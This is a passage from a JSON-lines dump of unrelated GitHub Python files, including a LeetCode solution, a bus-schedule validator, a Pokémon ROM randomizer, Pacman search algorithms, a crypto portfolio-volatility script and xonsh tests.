self.x509_details.to_dict()\n return _dict\n\n @classmethod\n def from_dict(cls, obj: dict) -> PublicKeyCertificate:\n \"\"\"Create an instance of PublicKeyCertificate from a dict\"\"\"\n if obj is None:\n return None\n\n if type(obj) is not dict:\n return PublicKeyCertificate.parse_obj(obj)\n\n _obj = PublicKeyCertificate.parse_obj({\n \"certificate\": obj.get(\"certificate\"),\n \"format\": obj.get(\"format\"),\n \"x509_details\": X509CertificateDetails.from_dict(obj.get(\"x509Details\")) if obj.get(\"x509Details\") is not None else None\n })\n return _obj\n\n","repo_name":"korewireless/OmniCore-Python-SDK","sub_path":"OmniCore/models/public_key_certificate.py","file_name":"public_key_certificate.py","file_ext":"py","file_size_in_byte":3377,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"39031245619","text":"# Invert Binary Tree\n\n# Definition for a binary tree node.\n# class TreeNode:\n# def __init__(self, val=0, left=None, right=None):\n# self.val = val\n# self.left = left\n# self.right = right\nclass Solution:\n def invertTree(self, root: Optional[TreeNode]) -> Optional[TreeNode]:\n \n def dfs(root):\n \n # if root doesnt exist, return\n if root is None:\n return\n \n # swap the root children around\n ph1 = root.left\n root.left = root.right\n root.right = ph1\n \n # dfs into both childrem\n dfs(root.left)\n dfs(root.right)\n \n dfs(root)\n \n return root","repo_name":"Steve-3PO/Leetcode","sub_path":"226.py","file_name":"226.py","file_ext":"py","file_size_in_byte":761,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"1984745856","text":"# Write your awesome code here\nimport json\nimport re\n\nclass EasyRider:\n\n def __init__(self ,data):\n self.data = json.loads(data)\n self.errors = {}\n\n def find_errors(self):\n data_names = [\"bus_id\", \"stop_id\", \"stop_name\", \"next_stop\", \"stop_type\", \"a_time\"]\n self.errors = dict.fromkeys(data_names, 0)\n for dct in self.data:\n if type(dct[\"bus_id\"]) != int:\n 
self.errors[\"bus_id\"] += 1\n if type(dct[\"stop_id\"]) != int:\n self.errors[\"stop_id\"] += 1\n if type(dct[\"stop_name\"]) != str or dct[\"stop_name\"] == \"\":\n self.errors[\"stop_name\"] += 1\n if type(dct[\"next_stop\"]) != int:\n self.errors[\"next_stop\"] += 1\n if type(dct[\"stop_type\"]) != str or len(dct[\"stop_type\"]) > 1:\n self.errors[\"stop_type\"] += 1\n if type(dct[\"a_time\"]) != str or dct[\"a_time\"] == \"\":\n self.errors[\"a_time\"] += 1\n return self.errors\n\n def find_format_errors(self):\n\n required = [\"stop_name\", \"stop_type\", \"a_time\"]\n self.errors = dict.fromkeys(required, 0)\n name_template = r\"[A-Z]\\w+\\s?\\w+?\\s(Road|Avenue|Boulevard|Street)$\"\n type_template = r'^$|[SOF]{1}$'\n hour_template = r\"([01]\\d|2[0-3]):([0-5]\\d)$\"\n for dct in self.data:\n if not re.match(name_template, dct[\"stop_name\"]):\n self.errors[\"stop_name\"] += 1\n if not re.match(type_template, dct[\"stop_type\"]):\n self.errors[\"stop_type\"] += 1\n if not re.match(hour_template, dct[\"a_time\"]):\n self.errors[\"a_time\"] += 1\n return self.errors\n\n def number_of_stops(self):\n\n errors = self.find_errors()\n if sum(list(errors.values())) == 0:\n errors = self.find_format_errors()\n else:\n self.print_output()\n if sum(list(errors.values())) == 0:\n bus_stops = {}\n else:\n self.print_format_errors()\n for dct in self.data:\n if dct[\"bus_id\"] not in bus_stops:\n bus_stops[dct[\"bus_id\"]] = 1\n\n else:\n bus_stops[dct[\"bus_id\"]] += 1\n\n return bus_stops\n\n def special_stops(self):\n check_start_stop = {}\n for dct in self.data:\n check_start_stop.setdefault(dct[\"bus_id\"], []).append(dct[\"stop_type\"])\n\n for key in check_start_stop:\n if not \"S\" in check_start_stop[key] or not \"F\" in check_start_stop[key]:\n return f\"There is no start or end stop for the line: {key}.\"\n else:\n stop_ids = [dct[\"stop_id\"] for dct in self.data]\n next_stops = [dct[\"next_stop\"] for dct in self.data]\n start_stops = {dct[\"stop_name\"] for dct in self.data if dct[\"stop_id\"] not in next_stops}\n transfer_stops = {dct[\"stop_name\"] for dct in self.data if stop_ids.count(dct[\"stop_id\"]) > 1}\n finish_stops = {dct[\"stop_name\"] for dct in self.data if dct[\"next_stop\"] not in stop_ids}\n\n\n return start_stops, transfer_stops, finish_stops\n\n\n\n def check_time(self):\n time_checker = {}\n data = self.data\n for i in range(len(data) - 1):\n\n if data[i][\"bus_id\"] == data[i + 1][\"bus_id\"]:\n while True:\n if not data[i][\"a_time\"] < data[i + 1][\"a_time\"]:\n time_checker.setdefault(data[i + 1][\"bus_id\"], []).append(data[i+1][\"stop_name\"])\n break\n break\n else:\n continue\n\n\n if time_checker:\n for key, value in time_checker.items():\n print(f\"bus_id line: {key}: wrong time on station {value[0]}\")\n else:\n print(f\"Arival time test:\\nOK\")\n\n def validate_on_demand_stops(self):\n\n start_stops, transfer_stops, finish_stops = self.special_stops()\n special_stops = start_stops | transfer_stops | finish_stops\n\n errors = [dct[\"stop_name\"] for dct in self.data if dct[\"stop_type\"] == \"O\" and dct[\"stop_name\"] in special_stops]\n print(\"On demand stops test:\")\n if len(errors) == 0:\n print(\"OK\")\n else:\n errors.sort()\n print(f\"Wrong stop type: {errors}\")\n\n return\n\n\n def print_special_stops(self):\n\n my_data = self.special_stops()\n if isinstance(my_data, str):\n print(my_data)\n else:\n start_stops, transfer_stops, finish_stops = my_data\n print(f\"Start stops: {len(start_stops)} {sorted(start_stops)}\")\n print(f\"Transfer 
stops {len(transfer_stops)} {sorted(transfer_stops)}\")\n print(f\"Finish stops: {len(finish_stops)} {sorted(finish_stops)}\")\n\n return\n\n\n def print_output(self):\n my_data = self.find_errors()\n print(f\"Type and required field validation: {sum(list(self.errors.values()))}\")\n for key, value in my_data.items():\n print(f\"{key}: {value}\")\n\n return\n\n def print_format_errors(self):\n\n my_data = self.find_format_errors()\n print(f\"Format validation: {sum(list(self.errors.values()))} errors\")\n for key, value in my_data.items():\n print(f\"{key}: {value}\")\n\n return\n\n def print_bus_stops(self):\n\n my_data = self.number_of_stops()\n print(\"Line names and number of stops: \")\n for key, value in my_data.items():\n print(f\"bus_id: {key}, stops: {value}\")\n\n return\n\nif __name__ == \"__main__\":\n easy = EasyRider(input())\n #easy.print_output()\n #easy.print_format_errors()\n #easy.print_bus_stops()\n #easy.print_special_stops()\n #easy.check_time()\n easy.validate_on_demand_stops()\n","repo_name":"andreimaftei28/Projects-on-JetBrainsAcademy","sub_path":"EasyRiderBusCompany_beta/easyrider.py","file_name":"easyrider.py","file_ext":"py","file_size_in_byte":5794,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"8682550081","text":"class Solution:\r\n def setBits(self, N):\r\n binary = bin(N)[2:]\r\n count=0\r\n for i in binary:\r\n if i==\"1\":\r\n count+=1\r\n return count\r\n\r\nif __name__ == \"__main__\":\r\n T = int(input())\r\n for i in range(T):\r\n n = int(input())\r\n ob = Solution()\r\n ans = ob.setBits(n)\r\n print(ans)","repo_name":"santha22/PythonPrograms","sub_path":"GFG/NumberOf1Bits.py","file_name":"NumberOf1Bits.py","file_ext":"py","file_size_in_byte":362,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"32095333545","text":"from functools import cache\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_el(tree, xpath):\n return tree.xpath(xpath)\n\n\n@cache\ndef load(url):\n response = requests.get(url)\n if response.status_code != 200:\n raise ConnectionError(f\"Something faied, request to URL '{url}' returned {response.status_code}\")\n soup = BeautifulSoup(response.content, \"html.parser\")\n\n names = []\n table = soup.find(\"table\", class_=\"task-list\")\n for row in table.children:\n if row.find(\"a\") != -1 and row.find(\"a\") is not None:\n names.append(f'{row.find(\"td\").text.strip()} {row.find(\"a\").text}')\n return names\n\n\ndef load_all_tasks(url):\n return load(url)\n\n\ndef load_suitable_tasks(url, level):\n try:\n level = int(level)\n except ValueError:\n print(f\"KSP-SK level is not a number: {level}\")\n return []\n return load(url)[level-1:level+4]\n\n\nif __name__ == \"__main__\":\n url = \"https://www.ksp.sk/ulohy/\"\n print(load_all_tasks(url))\n for i in range(1, 5):\n print(load_suitable_tasks(url, str(i)))\n","repo_name":"5K1PY/FolderMaker","sub_path":"globalVariables/scriptVariables/GetTasks/KSP-SK.py","file_name":"KSP-SK.py","file_ext":"py","file_size_in_byte":1074,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"8624295443","text":"import re\n\nimport pytest\n\nfrom xonsh import pretty\n\nlong_list = [\"str\"] * 30\nlong_list_exp = \"[\" + (\",\\n \".join([\"'str'\"] * 30) + \"]\")\nnested_long_list_exp = \"[[\" + (\",\\n \".join([\"'str'\"] * 30) + \"]]\")\ncases = [\n (1, \"1\"),\n (1.0, \"1.0\"),\n pytest.param(long_list, 
long_list_exp, id=\"long-list\"),\n pytest.param([long_list], nested_long_list_exp, id=\"nested-long-list\"),\n pytest.param(re.compile, \"\", id=\"function\"),\n (Exception, \"Exception\"),\n ({}, \"{}\"),\n pytest.param(\n dict(zip(range(30), range(100, 130))),\n \"\"\"\\\n{0: 100,\n 1: 101,\n 2: 102,\n 3: 103,\n 4: 104,\n 5: 105,\n 6: 106,\n 7: 107,\n 8: 108,\n 9: 109,\n 10: 110,\n 11: 111,\n 12: 112,\n 13: 113,\n 14: 114,\n 15: 115,\n 16: 116,\n 17: 117,\n 18: 118,\n 19: 119,\n 20: 120,\n 21: 121,\n 22: 122,\n 23: 123,\n 24: 124,\n 25: 125,\n 26: 126,\n 27: 127,\n 28: 128,\n 29: 129}\"\"\",\n id=\"long-dict\",\n ),\n (re.compile(\"1\"), \"re.compile(r'1', re.UNICODE)\"),\n pytest.param(\n dict([(0, 0), (2, 1), (1, 2), (4, 3), (3, 4)]),\n \"{0: 0, 2: 1, 1: 2, 4: 3, 3: 4}\",\n id=\"dict-preserve-order\",\n ),\n]\n\n\n@pytest.mark.parametrize(\"obj, exp\", cases)\ndef test_pretty_fn(obj, exp):\n result = pretty.pretty(obj)\n assert result == exp\n\n\ndef test_pretty_printer(capsys):\n pretty.pretty_print({})\n captured = capsys.readouterr()\n assert captured.out == \"{}\\n\"\n","repo_name":"xonsh/xonsh","sub_path":"tests/test_pretty.py","file_name":"test_pretty.py","file_ext":"py","file_size_in_byte":1379,"program_lang":"python","lang":"en","doc_type":"code","stars":7388,"dataset":"github-code","pt":"78"} +{"seq_id":"33166370433","text":"\"\"\"\nThis module randomizes the level and ID of the binary chunks\nof the correspondent entry of the Pokémon found on a dungeon.\n\nMore info:\nhttps://datacrystal.romhacking.net/wiki/Pok%C3%A9mon_Mystery_Dungeon:_Red_Rescue_Team:Dungeons_Floors_Data:Pok%C3%A9mon_Found\n\"\"\"\n\nimport random\n\ndef randomize(bs_rom: bytearray):\n addr = 0x4b6064 # Start address\n end_addr = 0x4c2a9b\n\n while addr < end_addr:\n poke = DungeonPokemon.from_memory(bs_rom, addr)\n if (poke.is_not_zero() and poke.can_be_replaced()\n and DungeonPokemon.is_safe(addr)):\n poke.randomize_p_id()\n poke.write(bs_rom, addr)\n addr += 8\n\nclass DungeonPokemon:\n def __init__(self, p_id, level):\n self.p_id = p_id\n self.level = level\n\n @staticmethod\n def from_memory(ba_rom: bytearray, address):\n poke = (ba_rom[address] << 8) | ba_rom[address + 1]\n p_id = (poke >> 8) | ((poke & 0x0001) << 8)\n level = (poke & 0x00ff) >> 1\n return DungeonPokemon(p_id, level)\n\n @staticmethod\n def is_safe(addr):\n \"\"\"\n This list represents address positions containing specific Pokémon\n that will not be altered to prevent crashing\n \"\"\"\n no_randomizable = [\n 0x4b626c, # Diglett (Mt. Steel)\n 0x4b6274, # Skarmory (Mt. Steel)\n 0x4b654c, # Ekands (Sinister Woods)\n 0x4b6554, # Gengar (Sinister Woods)\n 0x4b655c, # Medicham (Sinister Woods)\n 0x4b715c, # Charizard (Mt. Freeze)\n 0x4b7164, # Alakazam (Mt. Freeze)\n 0x4b716c, # Tyranitar (Mt. 
Freeze)\n 0x4b743c, # Charizard (Magma Cavern)\n 0x4b7444, # Tyranitar (Magma Cavern)\n 0x4b7464, # Alakazam (Magma Cavern)\n 0x4b92ac, # Medicham (Wish Cave)\n 0x4bdcd4, # Farfetch'D (Normal Maze)\n 0x4bdcdc, # Furret (Normal Maze)\n 0x4bdce4, # Zigzagoon (Normal Maze)\n 0x4bdd0c, # Ponyta (Fire Maze)\n 0x4bdd14, # Slugma (Fire Maze)\n 0x4bdd1c, # Magby (Fire Maze)\n 0x4bdd3c, # Poliwag (Water Maze)\n 0x4bdd9c, # Exeggcute (Grass Maze)\n 0x4bdda4, # Sunkern (Grass Maze)\n 0x4bddac, # Shroomish (Grass Maze)\n 0x4bddb4, # Cacnea (Grass Maze)\n 0x4bde04, # Voltorb (Electric Maze)\n 0x4bde0c, # Electrike (Electric Maze)\n 0x4bde34, # Swinub (Ice Maze)\n 0x4bde3c, # Piloswine (Ice Maze)\n 0x4bde4c, # Snorunt (Ice Maze)\n 0x4bde9c, # Hitmonlee (Fight Maze)\n 0x4bdea4, # Tyrogue (Fight Maze)\n 0x4bdeac, # Meditite (Fight Maze)\n 0x4bdecc, # Diglett (Ground Maze)\n 0x4bdedc, # Phanpy (Ground Maze)\n 0x4bdf24, # Pidgey (Flying Maze)\n 0x4bdf34, # Farfetch'D (Flying Maze)\n 0x4bdf3c, # Doduo (Flying Maze)\n 0x4bdf64, # Wobbuffet (Psychic Maze)\n 0x4bdfac, # Nidoran (Female) (Poison Maze)\n 0x4bdfb4, # Nidoran (Male) (Poison Maze)\n 0x4bdfdc, # Weedle (Bug Maze)\n 0x4bdfe4, # Beedrill (Bug Maze)\n 0x4bdfec, # Abra (Bug Maze)\n 0x4bdff4, # Pinsir (Bug Maze)\n 0x4be04c, # Geodude (Rock Maze)\n 0x4be054, # Sudowoodo (Rock Maze)\n 0x4be05c, # Pupitar (Rock Maze)\n 0x4be084, # Gastly (Ghost Maze)\n 0x4be0b4, # Bagon (Dragon Maze)\n 0x4be0bc, # Shelgon (Dragon Maze)\n 0x4be104, # Murkrow (Dark Maze)\n 0x4be10c, # Poochyena (Dark Maze)\n 0x4be134, # Aron (Steel Maze)\n 0x4be144, # Beldum (Steel Maze)\n 0x4be18c, # Nuzleaf (Team Shifty)\n 0x4be194, # Shiftry (Team Shifty)\n 0x4be1e4, # Tentacruel (Team Constrictor)\n 0x4be1ec, # Octillery (Team Constrictor)\n 0x4be1f4, # Cradily (Team Constrictor)\n 0x4be214, # Blastoise (Team Hydro)\n 0x4be224, # Feraligatr (Team Hydro)\n 0x4be22c, # Swampert (Team Hydro)\n 0x4be27c, # Graveler (Team Rumblerock)\n 0x4be284, # Golem (Team Rumblerock)\n 0x4be524, # Smeargle (Howling Forest)\n ]\n\n return not addr in no_randomizable\n\n def get_p_id(self):\n return self.p_id\n\n def get_level(self):\n return self.level\n\n def set_p_id(self, p_id):\n self.p_id = p_id\n\n def set_level(self, level):\n self.level = level\n\n def to_bin(self):\n # NOTE: The result is in big endian but we need to\n # rewrite it in little endian\n\n poke_be = self.p_id + (self.level << 9)\n\n first_byte = (0x00ff & poke_be) << 8\n second_byte = (0xff00 & poke_be) >> 8\n\n return first_byte | second_byte\n\n\n def randomize_p_id(self):\n \"\"\"\n There are some Pokémon IDs that will not be used, for randomization,\n mainly because they will never appear in the dungeon in normal conditions.\n \"\"\"\n not_used_p_ids = [\n 0x000, # ??????????\n 0x097, # Mew (doesnt appear)\n 0x179, # Castform (Snowy Form) (better to use normal Castform)\n 0x17a, # Castform (Sunny Form) \"\n 0x17b, # Castform (Rainy Form) \"\n 0x19e, # Deoxys (Normal Form) (only appears one time)\n 0x1a1, # Deoxys (Attack Form) (only appears as a illusion)\n 0x1a2, # Deoxys (Defense Form) \"\n 0x1a3, # Deoxys (Speed Form) \"\n 0x1a4, # Munchlax\n 0x1a5, # Decoy\n 0x1a6 # Statue\n ]\n\n valid_p_ids = [\n p_id for p_id in [*range(0x000, 0x1a7)]\n if p_id not in not_used_p_ids\n ]\n\n self.p_id = random.choice(valid_p_ids)\n\n def is_not_zero(self):\n return self.p_id > 0 and self.level > 0\n\n def can_be_replaced(self):\n \"\"\"\n There are some Pokémon IDs that will not be changed, to prevent\n crashing, many of them are legendary 
Pokémon IDs.\n \"\"\"\n no_replaceable = [\n 0x000, # ??????????\n 0x090, # Articuno\n 0x091, # Zapdos\n 0x092, # Moltres\n 0x096, # Mewtwo\n 0x097, # Mew\n 0x10c, # Raikou\n 0x10d, # Entei\n 0x10e, # Suicune\n 0x112, # Lugia\n 0x113, # Ho-Oh\n 0x114, # Celebi\n 0x179, # Castform (Snowy Form)\n 0x17a, # Castform (Sunny Form)\n 0x17b, # Castform (Rainy Form)\n 0x17c, # Kecleon\n 0x195, # Regirock\n 0x196, # Regice\n 0x197, # Registeel\n 0x198, # Latias\n 0x199, # Latios\n 0x19a, # Kyogre\n 0x19b, # Groudon\n 0x19c, # Rayquaza\n 0x19d, # Jirachi\n 0x19e, # Deoxys (Normal Form)\n 0x1a1, # Deoxys (Attack Form)\n 0x1a2, # Deoxys (Defense Form)\n 0x1a3, # Deoxys (Speed Form)\n 0x1a4, # Munchlax\n 0x1a5, # Decoy\n 0x1a6, # Statue\n 0x1a7, # Rayquaza (cutscene)\n ]\n return not self.p_id in no_replaceable\n\n def __str__(self):\n return hex(self.to_bin())\n\n def write(self, ba_rom, address):\n poke_bin = self.to_bin()\n\n first_byte = (0xff00 & poke_bin) >> 8\n second_byte = 0x00ff & poke_bin\n\n ba_rom[address] = first_byte\n ba_rom[address + 1] = second_byte\n","repo_name":"Suguivy/pmdrc-randomizer","sub_path":"src/randomizers/dungeonPokemon.py","file_name":"dungeonPokemon.py","file_ext":"py","file_size_in_byte":7490,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"39728084808","text":"import os\nfrom multiprocessing import Pool, cpu_count, freeze_support\nfrom utils.measure import measure_elapsed_time\nfrom utils.pokemon import get_pokemon_urls, get_pokemon_info\nfrom utils.data import write_file\nfrom shared import parse_args\n\n@measure_elapsed_time\ndef process_data_mp(data):\n\t\tpokemons = []\n\n\t\tpool = Pool(cpu_count())\n\t\tpokemons = pool.map(get_pokemon_info, data)\n\t\tpool.close()\n\t\tpool.join()\n\n\t\treturn pokemons\n\nif __name__ == '__main__':\n\t\targs = parse_args()\n\t\tfreeze_support()\n\t\turls = get_pokemon_urls(args.count)\n\t\tpokemons = process_data_mp(urls)\n\t\twrite_file(os.path.join(os.environ['DATA_DIR'], 'output','pokemons.json') , pokemons)","repo_name":"jerrythomas/feel-the-flow","sub_path":"src/02-pokemons/mp.py","file_name":"mp.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"4132180991","text":"\nimport pandas as pd\nimport numpy as np\nimport datetime\nimport requests\n\n# Address class to store HTTP address\nclass Address:\n contract_address=\"https://api.hbdm.com\"\n Kline_http=\"/market/history/kline\"\n\n# error handling method\ndef ErrorHandling(resp):\n error_code=resp.json()['err-code']\n error_msg=resp.json()['err-msg']\n print(\" \\nThere is an error when getting data from the server \\n erroe code: %s erroe message: %s\\n\"%(error_code,error_msg))\n\n# connect server and get row data\ndef Kline(symbol,period,size=150):\n get_msg=Address.contract_address+Address.Kline_http+\"?\"+\"symbol=%s&period=%s&size=%s\"%(symbol,period,size)\n resp=requests.get(get_msg)\n if resp.json()['status']==\"ok\":\n return resp\n else:\n ErrorHandling(resp)\n\n# select json format data in the given time periods\ndef Kline_json(symbol,period,begin_time,end_time):\n resp=Kline(symbol,period,2000)\n begin_time=datetime.datetime.timestamp(begin_time)\n end_time=datetime.datetime.timestamp(end_time)\n json_data=resp.json()\n data=[i for i in json_data['data'] if (i['id']>=begin_time)&(i['id']<=end_time)]\n json_data['data']=data\n return json_data\n\n# get the DataFrame format data\ndef 
Kline_dataframe(symbol,period,begin_time,end_time):\n json_data=Kline_json(symbol,period,begin_time,end_time)\n df=pd.DataFrame(json_data['data'])\n df['date']=df['id'].apply(lambda x: datetime.datetime.fromtimestamp(x))\n return df\n\n# calculate the weight of given data to get the minimum volatility\ndef minimum_volatility(dataframe):\n dataframe_cov=dataframe.cov()\n dataframe_cov_inv=np.linalg.inv(dataframe_cov)\n return dict(zip(dataframe.columns,dataframe_cov_inv.sum(axis=1)/dataframe_cov_inv.sum(axis=1).sum()))\n\n# calculate the coefficient of efficient frontier function\n# sigma^2=a*mu^2+b*mu+c \n# out put are a, b, c\ndef EfficientFrontier(dataframe):\n df_cov_inv=np.linalg.inv(dataframe.cov())\n df_return=np.mean(dataframe)\n a=df_cov_inv.sum()\n b=(df_cov_inv@df_return).sum()\n c=(df_return.T@df_cov_inv@df_return).sum()\n delta=a*c-b*b\n return a/delta, b/delta, c/delta,\n\n\n\n","repo_name":"kingnewbility/SingAlliance","sub_path":"SingAlliance/SingAlliance.py","file_name":"SingAlliance.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"38867381576","text":"# search.py\n# ---------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n\n\"\"\"\nIn search.py, you will implement generic search algorithms which are called by\nPacman agents (in searchAgents.py).\n\"\"\"\nfrom typing import List, Tuple\n\nimport util\n\n\n# from searchAgents import PositionSearchProblem\n\nclass SearchProblem:\n \"\"\"\n This class outlines the structure of a search problem, but doesn't implement\n any of the methods (in object-oriented terminology: an abstract class).\n\n You do not need to change anything in this class, ever.\n \"\"\"\n\n def getStartState(self) -> Tuple:\n \"\"\"\n Returns the start state for the search problem.\n \"\"\"\n util.raiseNotDefined()\n\n def isGoalState(self, state) -> bool:\n \"\"\"\n state: Search state\n\n Returns True if and only if the state is a valid goal state.\n \"\"\"\n util.raiseNotDefined()\n\n def getSuccessors(self, state) -> List[Tuple]:\n \"\"\"\n state: Search state\n\n For a given state, this should return a list of triples, (successor,\n action, stepCost), where 'successor' is a successor to the current\n state, 'action' is the action required to get there, and 'stepCost' is\n the incremental cost of expanding to that successor.\n \"\"\"\n util.raiseNotDefined()\n\n def getCostOfActions(self, actions):\n \"\"\"\n actions: A list of actions to take\n\n This method returns the total cost of a particular sequence of actions.\n The sequence must be composed of legal moves.\n \"\"\"\n util.raiseNotDefined()\n\n\ndef tinyMazeSearch(problem):\n \"\"\"\n Returns a sequence of moves that solves tinyMaze. 
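(It simply returns the hard-coded action list [s, s, w, s, w, w, s, w].) 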
For any other maze, the\n sequence of moves will be incorrect, so only use this for tinyMaze.\n \"\"\"\n from game import Directions\n s = Directions.SOUTH\n w = Directions.WEST\n return [s, s, w, s, w, w, s, w]\n\n\n# Our own node type\nclass Node:\n def __init__(self, state: Tuple[int, int], path: List[str] = None, cost: int = 0):\n if path is None:\n path = []\n self.state: Tuple[int, int] = state # the current location of this node\n self.path: List[str] = path # the path by which we can reach this node from start\n self.cost: int = cost # the current cost reaching from start to this node\n\n\n'''\nOur own dfs or bfs search function. \nThe only difference for them is that DFS uses a stack, while BFS uses a queue.\n'''\n\n\ndef dfs_or_bfs_search(problem: SearchProblem, fringe: util.Stack or util.Queue) -> List[str]:\n # create a stack/queue fringe, and 'visited' list\n visited: List[Tuple[int, int]] = []\n\n # push the first node (start state)\n start_state: Tuple[int, int] = problem.getStartState() # (3,4) [(3,4), []]\n fringe.push(Node(start_state))\n\n while not fringe.isEmpty():\n node: Node = fringe.pop() # pop the first node\n\n if problem.isGoalState(node.state): # check if we have reached the goal (goal node popped)\n return node.path\n\n if node.state not in visited: # check if we have visited. If visited, skip.\n visited.append(node.state)\n else:\n continue\n\n successor: List[Tuple[Tuple[int, int], str, int]] = problem.getSuccessors(node.state)\n for s in successor:\n # The type of each successor item looks like this:\n # e.g. (location, direction, step_cost) ((5, 4), 'South', 1)\n location: Tuple[int, int] = s[0]\n direction: str = s[1]\n if location not in visited:\n fringe.push(Node(state=location, path=node.path + [direction]))\n else:\n return [] # Solution not found!\n\n\ndef depthFirstSearch(problem: SearchProblem) -> List[str]:\n \"\"\"\n Search the deepest nodes in the search tree first.\n\n Your search algorithm needs to return a list of actions that reaches the\n goal. 
Make sure to implement a graph search algorithm.\n\n To get started, you might want to try some of these simple commands to\n understand the search problem that is being passed in:\n\n print(\"Start:\", problem.getStartState())\n print(\"Is the start a goal?\", problem.isGoalState(problem.getStartState()))\n print(\"Start's successors:\", problem.getSuccessors(problem.getStartState()))\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n return dfs_or_bfs_search(problem, util.Stack())\n\n\ndef breadthFirstSearch(problem: SearchProblem) -> List[str]:\n \"\"\"Search the shallowest nodes in the search tree first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n return dfs_or_bfs_search(problem, util.Queue())\n\n\ndef uniformCostSearch(problem: SearchProblem) -> List[str]:\n \"\"\"Search the node of least total cost first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n\n # create a priority queue as a fringe, and 'visited' list\n fringe: util.PriorityQueue = util.PriorityQueue()\n visited: List[Tuple[int, int]] = []\n # push the first node (start state)\n fringe.push(Node(state=problem.getStartState(), path=[], cost=0), 0)\n while not fringe.isEmpty():\n node: Node = fringe.pop() # pop a node\n if problem.isGoalState(node.state): # check if goal reached\n return node.path\n if node.state not in visited: # check if visited\n visited.append(node.state)\n else:\n continue\n\n # get and traverse successor\n successors: List[Tuple[Tuple[int, int], str, int]] = problem.getSuccessors(node.state)\n for s in successors:\n s_state: Tuple[int, int] = s[0]\n s_direction: str = s[1]\n s_step_cost: int = s[2]\n new_cost: int = node.cost + s_step_cost\n fringe.push(Node(state=s_state, path=node.path + [s_direction], cost=new_cost), new_cost)\n else:\n return [] # solution not found\n\n\ndef nullHeuristic(state, problem=None) -> int:\n \"\"\"\n A heuristic function estimates the cost from the current state to the nearest\n goal in the provided SearchProblem. 
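# --- Hedged sketch (annotation): nullHeuristic below returns 0, which makes
# aStarSearch behave like uniformCostSearch above. A Manhattan-distance
# heuristic is the usual drop-in for grid mazes; the `problem.goal` attribute
# assumed here comes from Berkeley's searchAgents, not from this file.
def manhattanHeuristic(state, problem=None):
    goal = problem.goal if problem is not None else (1, 1)
    return abs(state[0] - goal[0]) + abs(state[1] - goal[1])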
This heuristic is trivial.\n \"\"\"\n return 0\n\n\ndef aStarSearch(problem: SearchProblem, heuristic=nullHeuristic) -> List[str]:\n \"\"\"Search the node that has the lowest combined cost and heuristic first.\"\"\"\n \"*** YOUR CODE HERE ***\"\n\n # create a priority queue as a fringe, and 'visited' list\n fringe: util.PriorityQueue = util.PriorityQueue()\n visited: List[Tuple[int, int]] = []\n # push the first node (start state)\n start_state: Tuple[int, int] = problem.getStartState() # start state\n start_heu: int = heuristic(start_state, problem) # start state heuristic distance\n fringe.push(Node(state=start_state, path=[], cost=start_heu), start_heu)\n while not fringe.isEmpty():\n node: Node = fringe.pop() # pop a node\n if problem.isGoalState(node.state): # check if goal reached\n return node.path\n if node.state not in visited: # check if visited\n visited.append(node.state)\n else:\n continue\n\n # get and traverse successor\n successors: List[Tuple[Tuple[int, int], str, int]] = problem.getSuccessors(node.state)\n for s in successors:\n s_state: Tuple[int, int] = s[0]\n s_direction: str = s[1]\n s_step_cost: int = s[2]\n # cost from start to the successor node\n new_cost: int = node.cost + s_step_cost\n # estimated total cost (pass through successor node)\n total_cost: int = new_cost + heuristic(s_state, problem)\n fringe.push(Node(state=s_state, path=node.path + [s_direction], cost=new_cost), total_cost)\n else:\n return [] # solution not found\n\n\n# Abbreviations\nbfs = breadthFirstSearch\ndfs = depthFirstSearch\nastar = aStarSearch\nucs = uniformCostSearch\n","repo_name":"billhu0/CS181","sub_path":"Programming-Assignments/hw1a-search/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":8327,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"78"} +{"seq_id":"10093820861","text":"from nltk.tokenize import RegexpTokenizer\nfrom stop_words import get_stop_words\nfrom nltk.stem import WordNetLemmatizer\n\ntokenizer = RegexpTokenizer(r'\\w+')\nen_stop = get_stop_words('en')\ntoRemove = ['From:', 'To:', 'Cc:', 'Date:', 'Sent:', 'Subject:', 'Attachments:', 'Doc No', 'Case No', 'U.S.', 'UNCLASSIFIED', 'RELEASE', 'Department of State']\nwnl = WordNetLemmatizer()\n\ndef nlpPipeLine(doc):\n # Tokenize\n tokens = tokenizer.tokenize(doc.lower())\n # Removes stop words\n stopped = [ word for word in tokens if not word in en_stop and len(word)>1 ]\n # Performs stemming\n lemmatized = [ wnl.lemmatize(word) for word in stopped ]\n return lemmatized\n\ndef rawEmailCleaner(doc):\n # Keeps only the lines that do not contain one of the words in the list toRemove\n rawText = ' '.join([line for line in doc.split('\\n') if not sum([word in line for word in toRemove])])\n # Removes all uppercase words\n rawText = ' '.join([word.lower() for word in rawText.split(' ') if not word==word.upper()])\n return rawText\n\ndef processText(doc):\n return 